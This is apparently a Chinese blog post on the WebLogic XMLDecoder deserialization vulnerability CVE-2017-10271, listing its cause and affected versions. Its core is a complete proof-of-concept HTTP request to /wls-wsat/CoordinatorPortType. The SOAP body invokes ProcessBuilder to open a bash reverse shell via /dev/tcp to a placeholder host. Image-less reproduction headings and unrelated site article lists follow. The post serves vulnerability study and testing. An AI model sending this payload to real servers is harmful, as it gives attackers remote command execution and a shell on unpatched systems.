WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)

0x01 漏洞原因:

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

0x02 影响版本:

10.3.6.0;12.1.3.0;12.2.1.1

0x3 POC:

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: target-ip:7001

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: text/xml

Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<java version="1.4.0" class="java.beans.XMLDecoder">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</string>

</void>

</array>

<void method="start"/></void>

</java>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body/>

</soapenv:Envelope>

0x04 漏洞复现:

启动靶机环境:

访问靶机环境:

发送数据包:

接收反弹shell:

最新文章

  1. jdk jre jvm 三者之间关系
  2. shr 右移测试
  3. SharePoint 2013 Designer系列之自定义列表表单
  4. iframe标签书写导致div不显示
  5. python之基本数据类型
  6. R中list对象属性以及具有list性质的对象
  7. I.MX6 linux Qt 同时支持Touch、mouse
  8. HDU 2544 最短路 (最短路,spfa)
  9. php透明合并png与jpg图片
  10. OD: SEHOP
  11. 优化DOM交互
  12. Visual Studio Code 中编写 C++ 的工作流
  13. SQL优化小技巧
  14. 安装Python-Jenkins
  15. React native中的组建通知通信:
  16. 腾讯TBS X5 WebView的简单使用
  17. static成员函数不能调用non-static成员函数
  18. apache配置修改
  19. Oracle的基本语法,存储函数及触发器
  20. Appium+python自动化7-输入中文

热门文章

  1. MySQL datetime类型详解
  2. [JVM教程与调优] 了解JVM 堆内存溢出以及非堆内存溢出
  3. 特征选择与稀疏学习(Feature Selection and Sparse Learning)
  4. Python第七章-面向对象高级
  5. bootstrip安装
  6. 关于C#三层架构中的“分页”功能
  7. BigDecimal 笔记
  8. Servlet 中文乱码问题解析及详细解决方法
  9. 怎样用scratch2.0谱写音乐
  10. Vue-cli2.0 第3节 解读Vue-cli模板